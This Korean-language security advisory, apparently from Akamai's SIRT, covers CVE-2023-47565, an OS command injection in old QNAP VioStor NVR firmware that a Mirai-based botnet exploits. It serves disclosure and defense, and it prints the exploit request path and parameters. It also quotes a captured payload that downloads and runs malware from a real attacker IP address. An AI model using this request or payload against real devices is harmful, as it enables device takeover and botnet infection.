적극적으로 악용되는 QNAP VioStor NVR의 취약점: 수정됨, 패치 사용 가능
Executive Summary
Akamai 보안 인텔리전스 대응팀(SIRT)은 InfectedSlurs 권고 시리즈에 대한 추가 업데이트를 발표했으며, 영향을 받은 벤더사 중 한 곳은 권고 정보 및 가이드를 발표했습니다.
QNAP의 취약점은 인터넷에서 확인되었으며 CVSS v3 점수는 8.0, CVE ID는 CVE-2023-47565로 지정되었습니다.
인터넷에서 캡처된 악성 페이로드는 DDoS(Distributed Denial-of-Service) 봇넷을 생성하기 위해 Mirai 기반 멀웨어를 설치합니다.
Akamai는 원래 리서치에서 이러한 악용 시도를 식별하고 보안팀 직원 네트워크에서 발생할 수 있는 활성 감염을 식별하는 데 도움이 되는 광범위한 IOC(Indicator of Compromise), Snort 룰, YARA 룰 목록을 제공했습니다.
알아야 할 사항
SIRT는 InfectedSlurs 리서치의 일환으로 인터넷에서 활발하게 악용되고 있는 QNAP VioStor NVR(Network Video Recorder) 디바이스의 취약점을 발견했습니다. NVR 디바이스는 IP 카메라의 네트워크 기반 모니터링, 비디오 녹화, 재생, 원격 데이터 접속을 위한 고성능 네트워크 감시 솔루션입니다. 이 취약점의 CVSS v3 점수는 8.0이며 CVE ID는 CVE-2023-47565로 지정되었습니다.
이 취약점을 통해 인증된 공격자는 POST 요청을 통해 관리 인터페이스로 페이로드를 전달해 OS 명령 인젝션을 수행할 수 있습니다. 현재 설정에서는 캡처된 페이로드에서 디바이스 기본 인증정보를 활용합니다.
영향받는 QNAP VioStor NVR 펌웨어 버전은 다음과 같습니다.
VioStor NVR: 버전 5.0.0 이하(5.0.0은 2014년 6월 21일 출시)
QNAP는 이러한 디바이스에 대한 지원이 중단되었다고 간주하지만, 벤더사는 기존 디바이스에 있는 VioStor 펌웨어를 사용 가능한 최신 버전으로 업그레이드할 것을 권장합니다. 이 문제는 공개적으로 보고되거나 공개되지는 않았지만 이전에 패치된 적이 있습니다. 사용자는 또한 디바이스의 기본 비밀번호를 변경해야 합니다.
US-CERT에서도 이에 대한 권고 사항을 발표했습니다.
관찰된 악용
Akamai는 처음에 InfectedSlurs 캠페인 기간 동안 악용 페이로드를 검토했을 때, 관찰된 악용을 특정 디바이스나 제조업체와 확실하게 연결할 수 없었기 때문에 두 가지 제로데이 취약점에 대해서만 보고했습니다. 이로 인해 악용의 제로데이 분류를 확인하기가 어려웠습니다.
SIRT는 악용과 페이로드의 다양한 측면을 심층적으로 조사한 결과, 표적이 QNAP VioStor NVR 디바이스라고 판단했습니다. 이러한 디바이스는 캠페인의 타기팅 프로필에 부합하며, 취약한 기본 인증정보(설명서에서 발견되고 악용에서 관찰됨)와 함께 제공되었습니다. 처음 두 개의 제로데이 사례와 마찬가지로, 감염된 디바이스는 영향을 받은 IoT(Internet of Things) 및 NVR 디바이스의 NTP 설정에서 OS 명령 인젝션 취약점이 쉽게 이용될 수 있습니다.
이러한 이론을 전달받은 US-CERT는 Akamai SIRT, QNAP와 협력해 증거를 검토하고 SIRT의 이론을 확인하는 데 도움을 주었습니다. 최종적으로 QNAP는 페이로드가 단종되어 더 이상 지원되지 않는 VioStor 디바이스 중에서도 이전에 출시된 펌웨어의 이전 버전(5.0.0 이하)만 표적으로 삼은 것을 확인했습니다.
이 취약점은 /cgi-bin/server/server.cgi 경로에 POST를 생성하는 방식으로 악용됩니다. RCE(Remote Code Execution)는 SPECIFIC_SERVER 인수가 지정된 곳에 존재합니다(그림 1).
URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=
PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]
그림 1: 명령 인젝션을 통한 RCE 악용 시도 사례
캡처된 감염 페이로드의 예는 그림 2에 나와 있습니다.
wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86
그림 2: 캡처된 RCE 페이로드
기본 보안 관행의 중요성
기본이 중요합니다. 이번 관찰 결과는 초기 설정 시 디바이스의 기본 비밀번호를 변경하는 등 기본적인 보안 모범 사례의 중요성을 다시 한 번 강조합니다. 또한, 잠재적인 공격에 대비해 시스템을 지속적으로 업데이트하고, 시스템 또는 디바이스가 이상 행동을 보일 경우 수시로 확인하는 등 더욱 강력한 장기적이고 선제적인 보안 프로토콜을 구축하는 것이 중요하다는 점을 잘 알 수 있습니다.
결론
Akamai의 맞춤형 허니팟 네트워크 배포가 다시 한번 사이버 공격에 대한 귀중한 인사이트를 제공해 이전에는 알려지지 않았던 취약점을 밝혀냈습니다. 기본 인증정보와 지원되지 않는 오래된 네트워크 시스템의 존재는 봇넷 감염의 경로로 부상했습니다. 레거시 시스템은 멀웨어를 전파하기 위한 새로운 취약점을 발견하고 악용할 수 있는 비옥한 토양입니다.
이 조사 결과는 IoT 모범 사례에 대한 인식 제고와 교육이 매우 중요하다는 점을 잘 보여주며, 일반 소비자에게 관련 리스크를 강조합니다. 이러한 인식의 필요성은 소비자를 넘어 이러한 디바이스를 제조하는 제조업체에도 적용됩니다. 시스템 보안을 유지하려면 소프트웨어 지원 주기 연장 및 강제 비밀번호 변경과 같은 설정 시 보안을 강화하는 조치를 취하는 것이 중요합니다.
관심 유지
Akamai Security Intelligence Group은 고객사와 보안 커뮤니티 전반의 경각심을 고취하고자 이와 같은 위협을 계속해서 모니터링하고 보고서를 작성할 예정입니다. 더 많은 리서치를 확인하려면 X(구 Twitter)에서 Akamai를 팔로우해최신 정보를 받아보시기 바랍니다.
Akamai SIRT는 통신, 조정, 식별, 수정, 공개 노력에 도움을 준 CISA, US-CERT, QNAP 에 감사의 말씀을 전합니다.
